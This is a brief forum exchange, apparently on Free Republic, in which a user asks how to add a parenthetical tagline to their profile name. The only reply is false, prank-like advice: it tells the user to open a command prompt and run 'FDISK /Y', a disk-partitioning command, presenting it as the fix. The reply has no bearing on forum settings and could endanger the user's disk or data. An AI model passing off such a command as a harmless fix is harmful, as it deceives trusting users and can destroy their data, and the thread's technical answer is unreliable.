Freep technical help needed (profile change?)

I see that many posters here have a comment in parentheses next to their user names. I cannot figure out how to do that. Please explain to me how I it is done.

You have to fix your disk. Go to Start, then Command, Run and ender cmd. When you get the black dos prompt, simply type FDISK /Y and it should fix your disk so you can have a tagline.
